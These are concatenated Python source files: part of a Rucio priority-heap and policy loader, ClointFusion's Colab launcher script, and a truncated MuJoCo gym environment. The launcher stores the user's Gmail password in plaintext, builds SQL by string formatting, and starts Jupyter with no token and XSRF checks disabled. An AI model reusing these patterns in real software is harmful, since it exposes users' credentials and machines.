self.container[key] = self.ContainerSlot(position=len(self.heap) - 1, priority=value)
self._priority_decreased(key)
def __contains__(self, item):
return item in self.container
def top(self):
return self.heap[0]
def pop(self):
item = self.heap[0]
self.container.pop(item)
tmp_item = self.heap.pop()
if self.heap:
self.heap[0] = tmp_item
self.container[tmp_item].pos = 0
self._priority_increased(tmp_item)
return item
def _priority_decreased(self, item):
heap_changed = False
pos = self.container[item].pos
pos_parent = (pos - 1) // 2
while pos > 0 and self.container[self.heap[pos]].prio < self.container[self.heap[pos_parent]].prio:
tmp_item, parent = self.heap[pos], self.heap[pos_parent] = self.heap[pos_parent], self.heap[pos]
self.container[tmp_item].pos, self.container[parent].pos = self.container[parent].pos, self.container[tmp_item].pos
pos = pos_parent
pos_parent = (pos - 1) // 2
heap_changed = True
return heap_changed
def _priority_increased(self, item):
heap_changed = False
heap_len = len(self.heap)
pos = self.container[item].pos
pos_child1 = 2 * pos + 1
pos_child2 = 2 * pos + 2
heap_restored = False
while not heap_restored:
# find minimum between item, child1, and child2
if pos_child1 < heap_len and self.container[self.heap[pos_child1]].prio < self.container[self.heap[pos]].prio:
pos_min = pos_child1
else:
pos_min = pos
if pos_child2 < heap_len and self.container[self.heap[pos_child2]].prio < self.container[self.heap[pos_min]].prio:
pos_min = pos_child2
if pos_min != pos:
_, tmp_item = self.heap[pos_min], self.heap[pos] = self.heap[pos], self.heap[pos_min]
self.container[tmp_item].pos = pos
pos = pos_min
pos_child1 = 2 * pos + 1
pos_child2 = 2 * pos + 2
heap_changed = True
else:
heap_restored = True
self.container[self.heap[pos]].pos = pos
return heap_changed
def register_policy_package_algorithms(algorithm_type, dictionary):
'''
Loads all the algorithms of a given type from the policy package(s) and registers them
:param algorithm_type: the type of algorithm to register (e.g. 'surl', 'lfn2pfn')
:param dictionary: the dictionary to register them in
:param vo: the name of the relevant VO (None for single VO)
'''
def try_importing_policy(algorithm_type, dictionary, vo=None):
import importlib
try:
env_name = 'RUCIO_POLICY_PACKAGE' + ('' if not vo else '_' + vo.upper())
if env_name in os.environ:
package = os.environ[env_name]
else:
package = config.config_get('policy', 'package' + ('' if not vo else '-' + vo))
module = importlib.import_module(package)
if hasattr(module, 'get_algorithms'):
all_algorithms = module.get_algorithms()
if algorithm_type in all_algorithms:
algorithms = all_algorithms[algorithm_type]
if not vo:
dictionary.update(algorithms)
else:
# check that the names are correctly prefixed
for k in algorithms.keys():
if k.lower().startswith(vo.lower()):
dictionary[k] = algorithms[k]
else:
raise InvalidAlgorithmName(k, vo)
except (NoOptionError, NoSectionError, ImportError):
pass
from rucio.common import config
try:
multivo = config.config_get_bool('common', 'multi_vo')
except (NoOptionError, NoSectionError):
multivo = False
if not multivo:
# single policy package
try_importing_policy(algorithm_type, dictionary)
else:
# determine whether on client or server
client = False
if 'RUCIO_CLIENT_MODE' not in os.environ:
if not config.config_has_section('database') and config.config_has_section('client'):
client = True
else:
if os.environ['RUCIO_CLIENT_MODE']:
client = True
# on client, only register algorithms for selected VO
if client:
if 'RUCIO_VO' in os.environ:
vo = os.environ['RUCIO_VO']
else:
try:
vo = config.config_get('client', 'vo')
except (NoOptionError, NoSectionError):
vo = 'def'
try_importing_policy(algorithm_type, dictionary, vo)
# on server, list all VOs and register their algorithms
else:
from rucio.core.vo import list_vos
# policy package per VO
vos = list_vos()
for vo in vos:
try_importing_policy(algorithm_type, dictionary, vo['vo'])
|
Colab_Launcher.py
|
from helium._impl import selenium_wrappers
from pyautogui import KEYBOARD_KEYS
import pyinspect as pi
from rich import pretty
import os, sys, threading, time, traceback, platform, subprocess, sqlite3, requests
pi.install_traceback(hide_locals=True,relevant_only=True,enable_prompt=True)
pretty.install()
cf_icon_file_path = "Cloint-ICON.ico"
cursr = ""
connct = ""
email = ""
passwd= ""
url = 'https://raw.githubusercontent.com/ClointFusion/ClointFusion/master/requirements.txt'
FIRST_TIME = False
windows_os = "windows"
linux_os = "linux"
mac_os = "darwin"
os_name = str(platform.system()).lower()
if os_name == windows_os:
clointfusion_directory = r"C:\Users\{}\ClointFusion".format(str(os.getlogin()))
elif os_name == linux_os:
clointfusion_directory = r"/home/{}/ClointFusion".format(str(os.getlogin()))
elif os_name == mac_os:
clointfusion_directory = r"/Users/{}/ClointFusion".format(str(os.getlogin()))
os.chdir(clointfusion_directory)
try:
os.system("{} -m pip install --upgrade pip".format(sys.executable))
except Exception as ex:
print("Error updating PIP = " + str(ex) )
requirements_page = requests.get(url)
req_pkg_lst = str(requirements_page.text).splitlines()
req_pkg_lst = list(map(lambda s: s.strip(), req_pkg_lst))
def db_create_database_connect():
"""
Function to create a database and connect to it
"""
global cursr
global connct
try:
# connct = sqlite3.connect('{}.db'.format(database_name))
connct = sqlite3.connect(r'{}\{}.db'.format(clointfusion_directory,"ClointFusion_DB"))
cursr = connct.cursor()
# print('Created & Connected with Database \'{}\''.format("ClointFusion_DB"))
except Exception as ex:
print("Error in db_create_database_connect="+str(ex))
def db_create_table():
global cursr
global connct
try:
table_name = 'My_Table'
table_dict={'email': 'TEXT', 'passwd': 'TEXT'}
table = str(table_dict).replace("{","").replace("'","").replace(":","").replace("}","")
# table = table.replace('INT,','INT PRIMARY KEY,',1) #make first field as PK
exec_query = "CREATE TABLE IF NOT EXISTS {}({});".format(table_name,table)
cursr.execute("""{}""".format(exec_query))
connct.commit()
# print('Table \'{}\' created'.format(table_name))
except Exception as ex:
print("Error in db_create_table="+str(ex))
def db_check_record():
global cursr
global connct
global email, passwd
table_name = 'My_Table'
exec_query = "SELECT * FROM {};".format(table_name)
cursr.execute(exec_query)
all_results = cursr.fetchall()
if all_results:
email = all_results[0][0]
passwd = all_results[0][1]
return all_results
def db_insert_rows(email, passwd):
global cursr
global connct
table_name = 'My_Table'
table_dict = {'email':email,'passwd':passwd}
table_keys = str(table_dict.keys()).replace('dict_keys([',"").replace("'","").replace("])","")
table_values = str(table_dict.values()).replace('dict_values([',"").replace("])","")
exec_query = "INSERT INTO {}({}) VALUES({});".format(table_name,table_keys,table_values)
cursr.execute("""{}""".format(exec_query))
connct.commit()
# print("Row with values {} inserted into \'{}\'".format(table_values,table_name))
def _load_missing_python_packages_windows(list_of_required_packages_1=[]):
"""
Installs Windows OS specific python packages
"""
try:
list_of_required_packages = [x.strip().lower() for x in list_of_required_packages_1]
reqs = subprocess.check_output([sys.executable, '-m', 'pip', 'list'])
installed_packages = [str(r.decode().split('==')[0]).strip().lower() for r in reqs.split()]
missing_packages = ' '.join(list(set(list_of_required_packages)-set(installed_packages)))
if missing_packages:
print("{} package(s) are missing".format(missing_packages))
if "comtypes" in missing_packages:
os.system("{} -m pip install comtypes==1.1.7".format(sys.executable))
for pkg in missing_packages:
pkg_with_version = filter(lambda a: pkg in a, req_pkg_lst)
# print(pkg_with_version)
cmd = "pip install {}".format(list(pkg_with_version)[0])
# print(cmd)
os.system(cmd)
except Exception as ex:
print("Error in _load_missing_python_packages_windows="+str(ex))
try:
import pyautogui as pg
except Exception as ex:
_load_missing_python_packages_windows(['pyautogui'])
import pyautogui as pg
os_name = str(platform.system()).lower()
if os_name != 'windows':
pg.alert("Colab Launcher works only on windows OS as of now")
exit(0)
try:
import psutil
except:
_load_missing_python_packages_windows(["psutil"])
import psutil
def is_chrome_open():
try:
for proc in psutil.process_iter(['pid', 'name']):
# This will check if there exists any process running with executable name
if proc.info['name'] == 'chrome.exe':
yes_no=pg.confirm(text='Chrome browser needs to be closed !\n\nPlease click "Yes" to forcefully close it', title="ClointFusion's Colab Launcher", buttons=['Yes', 'No'])
if yes_no == 'Yes':
try:
subprocess.call("TASKKILL /f /IM CHROME.EXE",stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
except:
pass
try:
subprocess.call("TASKKILL /f /IM CHROMEDRIVER.EXE",stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
except:
pass
return False
else:
return True
except Exception as ex:
pg.alert("Error while closing chrome")
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
exit(0)
if is_chrome_open()==True:
pg.alert("Please close Google Chrome browser & try again")
exit(0)
# try:
# os.system("pip install -r {}".format(requirements_path))
# except Exception as ex:
try:
_load_missing_python_packages_windows(['setuptools ','wheel', 'watchdog','Pillow','pynput','pif','PyAutoGUI ','PySimpleGUI ','bs4','clipboard','emoji','folium ','helium','imutils','kaleido','keyboard','matplotlib','numpy','opencv-python','openpyxl','pandas','plotly','requests','selenium','texthero','wordcloud','zipcodes','pathlib3x','pathlib','PyQt5','email-validator','testresources','scikit-image ','pivottablejs','ipython ','comtypes','cryptocode','ImageHash','get-mac','xlsx2html ','simplegmail','xlwings ','jupyterlab','notebook','Pygments','psutil','gspread'])
except Exception as ex:
pg.alert("Error while executing pip install -r requirements.txt")
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
# finally:
# import ClointFusion_Lite as cfl
try:
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import helium as browser
except:
_load_missing_python_packages_windows(['selenium','helium'])
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import helium as browser
from webdriver_manager.chrome import ChromeDriverManager
# try:
# import ClointFusion
# except Exception as ex:
# try:
# # os.system("pip install ClointFusion")
# _load_missing_python_packages_windows(['clointfusion'])
# except:
# pg.alert("Error while executing pip install ClointFusion")
# exc_type, exc_value, exc_tb = sys.exc_info()
# pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
# sys.exit(0)
try:
# import keyboard as kb
import PySimpleGUI as sg
import pygetwindow as gw
sg.theme('Dark') # for PySimpleGUI FRONT END
except:
# _load_missing_python_packages_windows(['keyboard','PySimpleGUI','PyGetWindow'])
_load_missing_python_packages_windows(['PySimpleGUI','PyGetWindow'])
# import keyboard as kb
import PySimpleGUI as sg
import pygetwindow as gw
sg.theme('Dark') # for PySimpleGUI FRONT END
def launch_jupyter():
try:
cmd = "pip install --upgrade jupyter_http_over_ws>=0.0.8 && jupyter serverextension enable --py jupyter_http_over_ws"
# subprocess.call(cmd,stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
os.system(cmd)
cmd = 'jupyter notebook --no-browser --allow-root --NotebookApp.allow_origin="https://colab.research.google.com" --NotebookApp.token="" --NotebookApp.disable_check_xsrf=True'
# subprocess.call(cmd,stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
os.system(cmd)
except:
print("Error in launch_jupyter")
pg.alert("Error in launch_jupyter")
#Kill the port if busy
try:
os.system('taskkill /F /PID 8888')
cmd = "pip install --upgrade jupyter_http_over_ws>=0.0.7 && jupyter serverextension enable --py jupyter_http_over_ws"
os.system(cmd)
cmd = 'jupyter notebook --no-browser --allow-root --NotebookApp.allow_origin="https://colab.research.google.com" --NotebookApp.token="" --NotebookApp.disable_check_xsrf=True'
# 'jupyter notebook --NotebookApp.allow_origin='https://colab.research.google.com' --NotebookApp.port_retries=0 --notebook-dir="" --no-browser --allow-root --NotebookApp.token='' --NotebookApp.disable_check_xsrf=True --port=8888
os.system(cmd)
except Exception as ex:
print("Port is busy = "+str(ex))
db_create_database_connect()
db_create_table()
def get_email_password_from_user():
global FIRST_TIME
try:
layout = [[sg.Text("ClointFusion - Set Yourself Free for Better Work", font='Courier 16', text_color='orange')],
[sg.Text(text='Please enter Gmail ID:',font=('Courier 12'),text_color='yellow'),sg.Input(key='-GMAIL-', justification='c',focus=True)],
[sg.Text(text='Please enter Password:',font=('Courier 12'),text_color='yellow'),sg.Input(key='-PASSWD-', justification='c',password_char='*')],
[sg.Submit('OK',button_color=('white','green'),bind_return_key=True, focus=True),sg.CloseButton('Cancel',button_color=('white','firebrick'))],
[sg.Text("These credentials will be stored on you local computer, used to automatically login & will be associated with Colab Launcher")]]
window = sg.Window('ClointFusion - Colab Launcher',layout, return_keyboard_events=True,use_default_focus=False,disable_close=False,element_justification='c',keep_on_top=True, finalize=True,icon=cf_icon_file_path)
while True:
event, values = window.read()
if event is None or event == 'Cancel' or event == "Escape:27":
values = []
# break
sys.exit(0)
if event == 'OK':
if values and values['-GMAIL-'] and values['-PASSWD-']:
db_insert_rows(values['-GMAIL-'],values['-PASSWD-'])
FIRST_TIME = True
break
else:
pg.alert("Please enter all the values")
window.close()
except Exception as ex:
print("Error in get_colab_url_from_user="+str(ex))
def db_delete_data():
global cursr
cursr.execute("""{}""".format("DELETE FROM 'My_Table' WHERE email='mayur@cloint.com'"))
all_results = cursr.fetchall()
print(all_results)
# db_delete_data()
if not db_check_record():
get_email_password_from_user()
def get_colab_url_from_user():
ret_val = "cancelled"
try:
dropdown_list = ["ClointFusion Labs (Public)", "ClointFusion Starter (Hackathon)"] #"ClointFusion Lite (Interns Only)"
oldKey = "Please choose desired Colab :"
# oldValue = "https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb"
oldValue = 'ClointFusion Labs (Public)'
layout = [[sg.Text("ClointFusion - Set Yourself Free for Better Work", font='Courier 16', text_color='orange')],
[sg.Text(text=oldKey,font=('Courier 12'),text_color='yellow'),sg.Listbox(dropdown_list,size=(30, 5),key='user_choice',default_values=oldValue,enable_events=True,change_submits=True)],#oluser_choice
[sg.Submit('OK',button_color=('white','green'),bind_return_key=True, focus=True),sg.CloseButton('Cancel',button_color=('white','firebrick'))],
[sg.Text("This is an automated tool which connects ClointFusion Colab with your Local Runtime.\nSign-in using your Gmail ID & wait for setup to Finish..")]]
window = sg.Window('ClointFusion - Colab Launcher',layout, return_keyboard_events=True,use_default_focus=False,disable_close=False,element_justification='c',keep_on_top=True, finalize=True,icon=cf_icon_file_path)
while True:
event, values = window.read()
if event is None or event == 'Cancel' or event == "Escape:27":
values = []
break
if event == 'OK':
if values and values['user_choice']:
ret_val = str(values['user_choice'][0])
break
else:
pg.alert("Please enter all the values")
window.close()
except Exception as ex:
print("Error in get_colab_url_from_user="+str(ex))
finally:
return ret_val
def modify_file_as_text(text_file_path, text_to_search, replacement_text):
import fileinput
with fileinput.FileInput(text_file_path, inplace=True, backup='.bak') as file:
for line in file:
print(line.replace(text_to_search, replacement_text), end='')
def connect_to_local_runtime(user_choice):
try:
# import chromedriver_binary
if user_choice == "ClointFusion Labs (Public)":
colab_url = "https://accounts.google.com/signin/v2/identifier?authuser=0&hl=en&continue=https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb" #https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb"
# colab_url = "https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb"
# elif user_choice == "ClointFusion Lite (Interns Only)":
# #Extract encrypted version of ClointFusion_Lite to a specific folder and in Colab import that folder
# colab_url = 'https://accounts.google.com/signin/v2/identifier?authuser=0&hl=en&continue=https://colab.research.google.com/drive/11MvoQfNFXJqlXKcXV1LBVUE98Ks48M_a'
elif user_choice == "ClointFusion Starter (Hackathon)":
colab_url = 'https://accounts.google.com/signin/v2/identifier?authuser=0&hl=en&continue=https://colab.research.google.com/drive/1G9mh58z8AbWqBit2TC4Wgg6p_eHPvUJB'
user_data_path = "C:\\Users\\{}\\AppData\\Local\\Google\\Chrome\\User Data".format(os.getlogin())
modify_file_as_text(user_data_path + '\\Default\\Preferences', 'crashed', 'false')
options = Options()
options.add_argument("--start-maximized")
options.add_experimental_option('excludeSwitches', ['enable-logging'])
if os_name == "windows":
options.add_argument("user-data-dir=C:\\Users\\{}\\AppData\\Local\\Google\\Chrome\\User Data".format(os.getlogin()))
elif os_name == "darwin":
options.add_argument("user-data-dir=/Users/{}/Library/Application/Support/Google/Chrome/User Data".format(os.getlogin()))
options.add_argument(f"profile-directory=Default")
browser_driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
browser.set_driver(browser_driver)
browser.go_to(colab_url)
chrome = gw.getWindowsWithTitle('Google Chrome')[0]
chrome.activate()
# pg.doubleClick(pg.size()[0]/2,pg.size()[1]/2)
# kb.press_and_release('esc')
# kb.press_and_release('esc')
try:
browser.wait_until(browser.Text("Code").exists,timeout_secs=6)
except :#selenium_wrappers.common.exceptions.TimeoutException:
try:
browser.click(email)
except:
browser.write(email, into='Email or phone')
browser.click('Next')
time.sleep(0.5)
browser.write(passwd, into='Enter your password')
browser.click('Next')
time.sleep(0.5)
browser.wait_until(browser.Text("Code").exists,timeout_secs=240)
# kb.press_and_release('esc')
# time.sleep(0.2)
# pg.press(ESCAPE)
# time.sleep(0.2)
# press(ESCAPE)
# time.sleep(0.2)
if FIRST_TIME:
#create short-cut
browser.press(browser.CONTROL + 'mh')
time.sleep(1)
v = S("//input[@id='pref_shortcut_connectLocal']")
browser.write('',v)
browser.press(browser.CONTROL + '1')
time.sleep(0.5)
browser.click("SAVE")
time.sleep(1)
#use short-cut
browser.press(browser.CONTROL + '1')
time.sleep(1)
# pg.alert("HKHR")
pg.doubleClick(pg.size()[0]/2,pg.size()[1]/2)
time.sleep(1)
if FIRST_TIME:
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
pg.write("http://localhost:8888")
# kb.write("http://localhost:8888")
time.sleep(2)
# click("CONNECT")
# kb.press_and_release('TAB')
pg.hotkey('TAB')
time.sleep(0.5)
# pg.alert(1)
# kb.press_and_release('TAB')
pg.hotkey('TAB')
time.sleep(0.5)
# pg.alert(2)
else:
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
browser.press(browser.ENTER)
time.sleep(2)
# try:
# img = "Restore_Bubble.PNG"
# pos = pg.locateOnScreen(img, confidence=0.8) #region=
# pg.alert(pos)
# pg.click(*pos)
# except:
# pass
pg.alert("Ready ! Google Colab is now connected with your Local Runtime.\n\nPlease click 'OK' & you are all set to work on ClointFusion Colabs...")
except Exception as ex:
print("Error in connect_to_local_runtime="+str(ex))
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
pg.alert("Error in connect_to_local_runtime="+str(ex))
connect_to_local_runtime()
# def popup_msg():
# sg.PopupTimed("Loading... Please wait", auto_close=30)
if __name__ == "__main__":
try:
user_choice = get_colab_url_from_user()
if user_choice != "cancelled":
# creating threads
t1 = threading.Thread(target=connect_to_local_runtime,args=(user_choice,))
t2 = threading.Thread(target=launch_jupyter)
# t3 = threading.Thread(target=popup_msg)
t1.start()
t2.start()
# t3.start()
t1.join()
t2.join()
# t3.join()
else:
print("User Cancelled the Launch")
except Exception as ex:
pg.alert("Error in Main="+str(ex))
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
print("Error in Main="+str(ex))
|
mjc_env.py
|
import matplotlib.pyplot as plt
import numpy as np
import os
import random
from threading import Thread
import time
import traceback
import sys
import xml.etree.ElementTree as xml
from dm_control.mujoco import Physics, TextOverlay
from dm_control.mujoco.wrapper.mjbindings import enums
from dm_control.rl.control import PhysicsError
from gym import spaces
from gym.core import Env
import opentamp
from opentamp.envs.mjc_xml_utils import *
from opentamp.envs import transform_utils as T
BASE_XML = opentamp.__path__._path[0] +'/robot_info/empty.xml'
ENV_XML = opentamp.__path__._path[0] + '/robot_info/current_empty.xml'
SPECIFIC_ENV_XML = opentamp.__path__._path[0] + '/robot_info/temp_env_xmls/current_{0}.xml'
_MAX_FRONTBUFFER_SIZE = 2048
_CAM_WIDTH = 200
_CAM_HEIGHT = 150
CTRL_MODES = ['joint_angle', 'end_effector', 'end_effector_pos', 'discrete_pos', 'discrete']
class MJCEnv(Env):
metadata = {'render.modes': ['human', 'rgb_array', 'depth'], 'video.frames_per_second': 67}
def __init__(self, mode='end_effector', obs_include=[], items=[], include_files=[], include_items=[], im_dims=(_CAM_WIDTH, _CAM_HEIGHT), sim_freq=25, timestep=0.002, max_iter=250, mult=3e2, view=False, load_render=True, act_jnts=[], xmlid='0'):
assert mode in CTRL_MODES, 'Env mode must be one of {0}'.format(CTRL_MODES)
self.ctrl_mode = mode
self.active = True
self.cur_time = 0.
self.prev_time = 0.
self.timestep = timestep
self.sim_freq = sim_freq
self.mult = 3e2
self.use_viewer = view
self.use_glew = 'MUJOCO_GL' not in os.environ or os.environ['MUJOCO_GL'] == 'glfw'
self.obs_include = obs_include
self._joint_map_cache = {}
self._ind_cache = {}
self._type_cache = {}
self._user_data = {}
self._cache_rendering = False
self._cached_images = {}
self._last_rendered_state = (None, None)
self.im_wid, self.im_height = im_dims
self.items = items
self._item_map = {item[0]: item for item in items}
self.include_files = include_files
self.include_items = include_items
self.item_names = list(self._item_map.keys()) + [item['name'] for item in include_items]
self.act_jnts = act_jnts
self.xmlid = xmlid
self._load_model()
self._set_obs_info(obs_include)
for item in self.include_items:
if item.get('is_fixed', False): continue
name = item['name']
pos = item.get('pos', (0, 0, 0))
quat = item.get("quat", (1, 0, 0, 0))
self.set_item_pos(name, pos)
self.set_item_rot(name, quat)
self.init_state = self.physics.data.qpos.copy()
self._init_control_info()
self._max_iter = max_iter
self._cur_iter = 0
self.load_render = load_render
if self.load_render:
try:
from dm_control import render
except:
from dm_control import _render as render
self._viewer = None
if view and self.load_render:
self.add_viewer()
self.render(camera_id=0)
self.render(camera_id=0)
@classmethod
def load_config(cls, config):
mode = config.get("mode", "joint_angle")
obs_include = config.get("obs_include", [])
items = config.get("items", [])
include_files = config.get("include_files", [])
include_items = config.get("include_items", [])
im_dims = config.get("image_dimensions", (_CAM_WIDTH, _CAM_HEIGHT))
sim_freq = config.get("sim_freq", 25)
ts = config.get("mjc_timestep", 0.002)
mult = config.get("step_mult", 3e2)
view = config.get("view", False)
max_iter = config.get("max_iterations", 250)
load_render = config.get("load_render", True)
act_jnts = config.get("act_jnts", [])
xmlid = config.get("xmlid", 0)
return cls(mode, obs_include, items, include_files, include_items, im_dims, sim_freq, ts, max_iter, mult, view, load_render=load_render, act_jnts=act_jnts, xmlid=xmlid)
def _load_model(self):
xmlpath = SPECIFIC_ENV_XML.format(self.xmlid)
generate_xml(BASE_XML, xmlpath, self.items, self.include_files, self.include_items, timestep=self.timestep)
self.physics = Physics.from_xml_path(xmlpath)
def _init_control_info(self):
print('No control information to initialize.')
def add_viewer(self):
if self._viewer is not None: return
self.cur_im = np.zeros((self.im_height, self.im_wid, 3))
self._launch_viewer(_CAM_WIDTH, _CAM_HEIGHT)
def _launch_viewer(self, width, height, title='Main'):
self._matplot_view_thread = None
if self.use_glew:
from dm_control.viewer import viewer
from dm_control.viewer import views
from dm_control.viewer import gui
from dm_control.viewer import renderer
self._renderer = renderer.NullRenderer()
self._render_surface = None
self._viewport = renderer.Viewport(width, height)
self._window = gui.RenderWindow(width, height, title)
self._viewer = viewer.Viewer(
self._viewport, self._window.mouse, self._window.keyboard)
self._viewer_layout = views.ViewportLayout()
self._viewer.render()
else:
self._viewer = None
self._matplot_im = None
self._run_matplot_view()
def _reload_viewer(self):
if self._viewer is None or not self.use_glew: return
if self._render_surface:
self._render_surface.free()
if self._renderer:
self._renderer.release()
self._render_surface = render.Renderer(
max_width=_MAX_FRONTBUFFER_SIZE, max_height=_MAX_FRONTBUFFER_SIZE)
self._renderer = renderer.OffScreenRenderer(
self.physics.model, self._render_surface)
self._renderer.components += self._viewer_layout
self._viewer.initialize(
self.physics, self._renderer, touchpad=False)
self._viewer.zoom_to_scene()
def _render_viewer(self, pixels):
if self.use_glew:
with self._window._context.make_current() as ctx:
ctx.call(
self._window._update_gui_on_render_thread, self._window._context.window, pixels)
self._window._mouse.process_events()
self._window._keyboard.process_events()
else:
if self._matplot_im is not None:
self._matplot_im.set_data(pixels)
plt.draw()
def _run_matplot_view(self):
self._matplot_view_thread = Thread(target=self._launch_matplot_view)
self._matplot_view_thread.daemon = True
self._matplot_view_thread.start()
def _launch_matplot_view(self):
try:
# self._matplot_im = plt.imshow(self.render(view=False))
self._matplot_im = plt.imshow(self.cur_im)
plt.show()
except Error:
print('\nCould not find display to launch viewer (this does not affect the ability to render images)\n')
@property
def qpos(self):
return self.physics.data.qpos
@property
def qvel(self):
return self.physics.data.qvel
@property
def qacc(self):
return self.physics.data.qacc
def step(self, action, mode=None, obs_include=None, gen_obs=True, view=False, debug=False):
for t in range(self.sim_freq):
cur_state = self.physics.data.qpos.copy()
cur_act = self.get_jnt_vec(self.act_jnts)
if mode is None or mode == 'position' or mode == 'joint_angle':
self.physics.set_control(action)
elif mode == 'velocity':
self.physics.set_control(self.mult*(action-cur_act))
qacc = self.physics.data.actuator_force.copy()
try:
self.physics.step()
except PhysicsError as e:
#traceback.print_exception(*sys.exc_info())
print('\nERROR IN PHYSICS SIMULATION; RESETTING ENV.\n')
self.physics.reset()
self.physics.data.qpos[:] = cur_state[:]
self.physics.forward()
if not gen_obs: return
return self.get_obs(obs_include=obs_include, view=view), \
self.compute_reward(), \
self.is_done(), \
{}
def get_sensors(self, sensors=[]):
if not len(sensors):
return self.physics.data.sensordata.copy()
inds = [self.physics.model.name2id[s] for s in sensors]
return self.physics.data.sensordata[inds]
def get_state(self):
return self.physics.data.qpos.copy()
def set_state(self, state):
self.physics.data.qpos[:] = state
self.physics.forward()
'''
def __getstate__(self):
return self.physics.data.qpos.tolist()
'''
'''
def __setstate__(self, state):
self.physics.data.qpos[:] = state
self.physics.forward()
'''
def _set_obs_info(self, obs_include):
self._obs_inds = {}
self._obs_shape = {}
ind = 0
if 'overhead_image' in obs_include or not len(obs_include):
self._obs_inds['overhead_image'] = (ind, ind+3*self.im_wid*self.im_height)
self._obs_shape['overhead_image'] = (self.im_height, self.im_wid, 3)
ind += 3*self.im_wid*self.im_height
# if 'forward_image' in obs_include or not len(obs_include):
# self._obs_inds['forward_image'] = (ind, ind+3*self.im_wid*self.im_height)
# self._obs_shape['forward_image'] = (self.im_height, self.im_wid, 3)
# ind += 3*self.im_wid*self.im_height
for item, xml, info in self.items:
if item in obs_include or not len(obs_include):
self._obs_inds[item] = (ind, ind+3) # Only store 3d Position
self._obs_shape[item] = (3,)
ind += 3
self.dO = ind
self.observation_space = spaces.Box(low=-np.inf, high=np.inf, shape=(ind,), dtype='float32')
return ind
def get_obs(self, obs_include=None, view=False):
obs = np.zeros(self.dO)
if obs_include is None:
obs_include = self.obs_include
if self.load_render:
if view or not len(obs_include) or 'overhead_image' in obs_include:
pixels = self.render(height=self.im_height, width=self.im_wid, camera_id=0, view=view)
if 'overhead_image' in self._obs_inds:
inds = self._obs_inds['overhead_image']
obs[inds[0]:inds[1]] = pixels.flatten()
# if not len(obs_include) or 'forward_image' in obs_include:
# pixels = self.render(height=self.im_height, width=self.im_wid, camera_id=1, view=view)
# inds = self._obs_inds['forward_image']
# obs[inds[0]:inds[1]] = pixels.flatten()
for item in self.items:
if not len(obs_include) or item[0] in obs_include:
inds = self._obs_inds[item[0]]
obs[inds[0]:inds[1]] = self.get_item_pos(item[0])
return np.array(obs)
def get_obs_types(self):
return list(self._obs_inds.keys())
def get_obs_inds(self, obs_type):
if obs_type not in self._obs_inds:
raise KeyError('{0} is not a valid observation for this environment. Valid options: {1}'.format(obs_type, self.get_obs_types()))
return self._obs_inds[obs_type]
def get_obs_shape(self, obs_type):
if obs_type not in self._obs_inds:
raise KeyError('{0} is not a valid observation for this environment. Valid options: {1}'.format(obs_type, self.get_obs_types()))
return self._obs_shape[obs_type]
def get_obs_data(self, obs, obs_type):
obs = np.array(obs)
if obs_type not in self._obs_inds:
raise KeyError('{0} is not a valid observation for this environment. Valid options: {1}'.format(obs_type, self.get_obs_types()))
inds = self._obs_inds[obs_type]
return obs[inds[0]:inds[1]].reshape(self._obs_shape[obs_type])
def get_attr(self, name, attr, mujoco_frame=True):
if attr.find('ee_pos') >= 0:
name = attr.replace('ee_pos', 'gripper')
attr = 'pose'
if attr in self.geom.jnt_names:
jnts = self._jnt_inds[attr]
bnds = self.geom.get_joint_limits(attr)
vals = self.get_joints(jnts, vec=True)
return np.maximum(np.minimum(bnds[1], vals), bnds[0])
if attr == 'pose' or attr == 'pos':
return self.get_item_pos(name, mujoco_frame)
if attr in ['rot', 'rotation', 'quat', 'euler']:
euler = attr == 'euler'
return self.get_item_rot(name, mujoco_frame, euler)
if hasattr(self, 'get_{}'.format(attr)):
return getattr(self, 'get_{}'.format(attr))(name, mujoco_frame=True)
raise NotImplementedError('Could not retrieve value of {} for {}'.format(attr, name))
def set_attr(self, name, attr, val, mujoco_frame=True, forward=True):
if attr in self.geom.jnt_names:
jnts = self.geom.jnt_names[attr]
if len(val) == 1: val = [val[0] for _ in jnts]
return self.set_joints(dict(zip(jnts, val)), forward=forward)
if attr == 'pose' or attr == 'pos':
return self.set_item_pos(name, val, mujoco_frame, forward=forward)
if attr in ['rot', 'rotation', 'quat', 'euler']:
return self.set_item_rot(name, val, mujoco_frame, forward=forward)
if hasattr(self, 'set_{}'.format(attr)):
return getattr(self, 'set_{}'.format(attr))(name, val, mujoco_frame, forward=forward)
raise NotImplementedError('Could not set value of {} for {}'.format(attr, name))
def get_pos_from_label(self, label, mujoco_frame=True):
try:
pos = self.get_item_pos(label, mujoco_frame)
except:
pos = None
return pos
def get_item_pos(self, name, mujoco_frame=True, rot=False):
model = self.physics.model
item_type = 'joint'
if name in self._type_cache:
item_type = self._type_cache[name]
pos = [np.nan, np.nan, np.nan]
if rot: pos.append(np.nan)
if item_type == 'joint':
try:
ind = model.name2id(name, 'joint')
adr = model.jnt_qposadr[ind]
if rot:
